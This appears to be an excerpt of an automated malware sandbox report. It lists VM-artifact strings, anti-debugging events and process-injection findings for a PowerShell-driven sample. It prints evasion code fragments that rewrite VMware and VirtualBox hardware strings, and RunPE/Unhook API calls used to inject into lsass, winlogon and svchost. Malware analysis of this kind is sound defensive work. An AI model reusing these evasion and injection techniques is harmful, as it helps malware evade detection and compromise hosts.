Source: svchost.exe, 00000031.00000002.3426686743.0000022E67060000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: D8VMwareVirtual disk6000c29c2bea38880a8a16ee9f37bec9
Source: Amcache.hve.11.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx.49.dr Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1ap
Source: Microsoft-Windows-PowerShell%4Operational.evtx.49.dr Binary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware Virtual disk", $value).replace("VMware", $value).replace("HARDDISK", "WDC").replace("VIRTUAL_DISK", $value)
Source: Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx.49.dr Binary or memory string: D8VMwareVirtual disk6000c29c2bea38880a8a16ee9f37bec98
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.49.dr Binary or memory string: LSI_SASVMware Virtual disk 6000c29c2bea38880a8a16ee9f37bec9
Source: svchost.exe, 00000029.00000000.2774511050.0000014E41C13000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
Source: Microsoft-Windows-PowerShell%4Operational.evtx.49.dr Binary or memory string: $value = $pr.Value.replace("VEN_80EE", $value).replace("VEN_15AD", $value).replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("82801FB", $value).replace("82441FX", $value).replace("82371SB", $value).replace("OpenHCD", $value).replace("VMWare", $value).replace("VMware", $value)
Source: powershell.exe, 00000008.00000002.2406288380.000001D49FAC9000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: qemu-ga
Source: powershell.exe, 00000008.00000002.2406288380.000001D49FD67000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: vmicshutdown
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.49.dr Binary or memory string: nonicNECVMWarVMware SATA CD00
Source: Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx.49.dr Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a@
Source: powershell.exe, 00000008.00000002.2406288380.000001D49FD67000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: $Hyper-V Time Synchronization Service
Source: Amcache.hve.11.dr Binary or memory string: VMware20,1
Source: powershell.exe, 00000008.00000002.2406288380.000001D49FD67000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: vmicvss
Source: Amcache.hve.11.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.11.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.11.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.11.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: svchost.exe, 00000031.00000000.2821524945.0000022E6747B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: vmciAP<
Source: svchost.exe, 00000031.00000000.2821695169.0000022E6749C000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: dowvmci
Source: Amcache.hve.11.dr Binary or memory string: VMware VMCI Bus Device
Source: Microsoft-Windows-PushNotification-Platform%4Operational.evtx.49.dr Binary or memory string: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
Source: powershell.exe, 00000008.00000002.2406288380.000001D49FD67000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V Data Exchange Service
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.49.dr Binary or memory string: nonicVMware Virtual disk 6000c29c2bea38880a8a16ee9f37bec9
Source: powershell.exe, 00000008.00000002.2406288380.000001D49FD67000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: vmmouse.sys
Source: powershell.exe, 00000008.00000002.2406288380.000001D49FD67000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V Guest Service Interface
Source: powershell.exe, 00000008.00000002.2406288380.000001D49FD67000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: -Hyper-V Remote Desktop Virtualization Service
Source: Amcache.hve.11.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: lsass.exe, 00000028.00000002.3408803122.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: pvmicvssNT SERVICE
Source: Amcache.hve.11.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.11.dr Binary or memory string: VMware, Inc.
Source: Amcache.hve.11.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.11.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.11.dr Binary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
Source: powershell.exe, 00000008.00000002.2406288380.000001D49FE57000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: vboxmouse.sys
Source: Amcache.hve.11.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: powershell.exe, 00000008.00000002.2406288380.000001D49FD67000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: C:\Program Files\VMware
Source: Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx.49.dr Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a8
Source: Microsoft-Windows-PushNotification-Platform%4Operational.evtx.49.dr Binary or memory string: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>art(
Source: Microsoft-Windows-Partition%4Diagnostic.evtx.49.dr Binary or memory string: VMwareVirtual disk2.06000c2942fce4d06663969f532e45d1aPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218e0f40&0&00
Source: Amcache.hve.11.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: lsass.exe, 00000028.00000000.2769194456.000002D6F0613000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3404687627.000002D6F0613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000002.3394717290.0000014E41C13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000000.2774511050.0000014E41C13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002C.00000002.3407396288.0000023C9FE2B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002C.00000000.2798624056.0000023C9FE2B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002D.00000000.2802138190.000001A1CA034000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002D.00000002.3395077606.000001A1CA02A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002F.00000000.2812656244.00000200A1241000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002F.00000002.3408969107.00000200A1241000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000002.3416713166.0000022E66A43000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: powershell.exe, 00000008.00000002.2406288380.000001D49FD67000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V Guest Shutdown Service
Source: lsass.exe, 00000028.00000002.3408803122.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: pvmicshutdownNT SERVICE
Source: Amcache.hve.11.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.49.dr Binary or memory string: nonicVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
Source: svchost.exe, 00000036.00000000.2839389298.00000227D882B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: NXTVMWare
Source: svchost.exe, 00000031.00000002.3464975209.0000022E67EE7000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: s\Gvmci
Source: svchost.exe, 0000002D.00000000.2801923475.000001A1CA000000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
Source: Amcache.hve.11.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: powershell.exe, 00000008.00000002.2406288380.000001D49FE57000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: c:\program files\vmware
Source: lsass.exe, 00000028.00000002.3408803122.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: pvmicheartbeatNT SERVICE
Source: powershell.exe, 00000008.00000002.2406288380.000001D49FD67000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VBoxSF.sys
Source: dwm.exe, 0000002A.00000002.3466156468.000001D156B0A000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: Microsoft-Windows-Partition%4Diagnostic.evtx.49.dr Binary or memory string: VMwareVirtual disk2.06000c29c2bea38880a8a16ee9f37bec9PCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218e0f40&0&00
Source: C:\Windows\System32\dllhost.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\dllhost.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\wbem\WMIC.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugFlags
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugObjectHandle
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugFlags
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugObjectHandle
Source: C:\Windows\System32\cmd.exe Code function: 17_2_00000253FC4084B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 17_2_00000253FC4084B0
Source: C:\Windows\System32\cmd.exe Code function: 17_2_00000253FC401E3C LoadLibraryA,GetProcAddress,SleepEx, 17_2_00000253FC401E3C
Source: C:\Windows\System32\cmd.exe Code function: 17_2_00000253FC40F440 GetProcessHeap, 17_2_00000253FC40F440
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\dllhost.exe Process token adjusted: Debug
Source: C:\Windows\System32\cmd.exe Code function: 17_2_00000253FC408814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 17_2_00000253FC408814
Source: C:\Windows\System32\cmd.exe Code function: 17_2_00000253FC4084B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 17_2_00000253FC4084B0
Source: C:\Windows\System32\cmd.exe Code function: 17_2_00000253FC40CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 17_2_00000253FC40CD80
Source: C:\Windows\System32\cmd.exe Code function: 17_2_00000253FC438814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 17_2_00000253FC438814
Source: C:\Windows\System32\cmd.exe Code function: 17_2_00000253FC4384B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 17_2_00000253FC4384B0
Source: C:\Windows\System32\cmd.exe Code function: 17_2_00000253FC43CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 17_2_00000253FC43CD80
Source: C:\Windows\System32\conhost.exe Code function: 18_2_000002A5AF36CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 18_2_000002A5AF36CD80
Source: C:\Windows\System32\conhost.exe Code function: 18_2_000002A5AF368814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 18_2_000002A5AF368814
Source: C:\Windows\System32\conhost.exe Code function: 18_2_000002A5AF3684B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 18_2_000002A5AF3684B0
Source: C:\Windows\System32\conhost.exe Code function: 37_2_000001780DD28814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 37_2_000001780DD28814
Source: C:\Windows\System32\conhost.exe Code function: 37_2_000001780DD2CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 37_2_000001780DD2CD80
Source: C:\Windows\System32\conhost.exe Code function: 37_2_000001780DD284B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 37_2_000001780DD284B0
Source: C:\Windows\System32\dllhost.exe Code function: 38_2_0000020175EBCD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 38_2_0000020175EBCD80
Source: C:\Windows\System32\dllhost.exe Code function: 38_2_0000020175EB84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 38_2_0000020175EB84B0
Source: C:\Windows\System32\dllhost.exe Code function: 38_2_0000020175EB8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 38_2_0000020175EB8814
Source: C:\Windows\System32\dllhost.exe Code function: 38_2_0000020175EECD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 38_2_0000020175EECD80
Source: C:\Windows\System32\dllhost.exe Code function: 38_2_0000020175EE84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 38_2_0000020175EE84B0
Source: C:\Windows\System32\dllhost.exe Code function: 38_2_0000020175EE8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 38_2_0000020175EE8814
Source: C:\Windows\System32\winlogon.exe Code function: 39_2_000002D0165E8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 39_2_000002D0165E8814
Source: C:\Windows\System32\winlogon.exe Code function: 39_2_000002D0165E84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 39_2_000002D0165E84B0
Source: C:\Windows\System32\winlogon.exe Code function: 39_2_000002D0165ECD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 39_2_000002D0165ECD80
Source: C:\Windows\System32\winlogon.exe Code function: 39_2_000002D016618814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 39_2_000002D016618814
Source: C:\Windows\System32\winlogon.exe Code function: 39_2_000002D0166184B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 39_2_000002D0166184B0
Source: C:\Windows\System32\winlogon.exe Code function: 39_2_000002D01661CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 39_2_000002D01661CD80

HIPS / PFW / Operating System Protection Evasion

Source: 35.2.powershell.exe.4040b0.1.raw.unpack, RunPE.cs .Net Code: Run contains injection code
Source: 36.2.powershell.exe.1b4b4d149e8.12.raw.unpack, RunPE.cs .Net Code: Run contains injection code
Source: 36.2.powershell.exe.1b4bd200000.16.raw.unpack, RunPE.cs .Net Code: Run contains injection code
Source: 35.2.powershell.exe.4040b0.1.raw.unpack, Unhook.cs Reference to suspicious API methods: VirtualProtect((IntPtr)((long)moduleHandle + num5), (IntPtr)num6, 64u, out var oldProtect)
Source: 35.2.powershell.exe.4040b0.1.raw.unpack, RunPE.cs Reference to suspicious API methods: OpenProcess(128, inheritHandle: false, parentProcessId)
Source: 35.2.powershell.exe.4040b0.1.raw.unpack, RunPE.cs Reference to suspicious API methods: NtAllocateVirtualMemory(process, ref address, IntPtr.Zero, ref size2, 12288u, 64u)
Source: 35.2.powershell.exe.4040b0.1.raw.unpack, RunPE.cs Reference to suspicious API methods: NtWriteVirtualMemory(process, address, payload, num3, IntPtr.Zero)
Source: 35.2.powershell.exe.4040b0.1.raw.unpack, RunPE.cs Reference to suspicious API methods: NtSetContextThread(thread, intPtr5)
Source: C:\Windows\System32\dllhost.exe Code function: 38_2_0000000140002434 CreateProcessW,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,VirtualAlloc,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,VirtualAlloc,Wow64GetThreadContext,WriteProcessMemory,Wow64SetThreadContext,OpenProcess,TerminateProcess, 38_2_0000000140002434
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe EIP: 3000000
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\winlogon.exe EIP: 16582EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\lsass.exe EIP: F14E2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 41FA2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\winlogon.exe EIP: 16582EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\lsass.exe EIP: F14E2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 41FA2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\dwm.exe EIP: 5B042EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: F32B2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 9FD62EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: CA6E2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\dwm.exe EIP: 5B012EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: F32B2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 9FD62EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: CA6E2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: EDE62EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: ED7B2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: A19B2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 95FB2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: A1982EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 95FB2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 670F2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 4A4B2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 19A42EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 670C2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 4A4B2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 19A42EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: D2662EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: D1FC2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: BDCC2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: BDC92EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: D9542EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: D2C72EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: D8FC2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: D2C72EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: CE6E2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: CE6B2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: AF662EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: AEFD2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: B6972EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A22A2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 25AA2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1A2F2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 63952EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 4ABA2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F03D2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: AF3C2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: EBEB2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8E1B2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A7DC2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 12A2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C0F52EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D7C2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 68FC2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: EA802EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: CE892EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D5BB2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: DEB72EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C0462EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A2152EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8EB2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 60742EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 569B2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8FE62EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 3DC22EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 99B22EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 984F2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 81BB2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D2D92EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: DE442EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1D0E2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: B6942EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 86A2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D1E52EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A22A2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D2002EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 25AA2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 155B2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1A2F2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 43E52EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 63952EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A6F82EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 4ABA2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 68252EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F03D2EBC
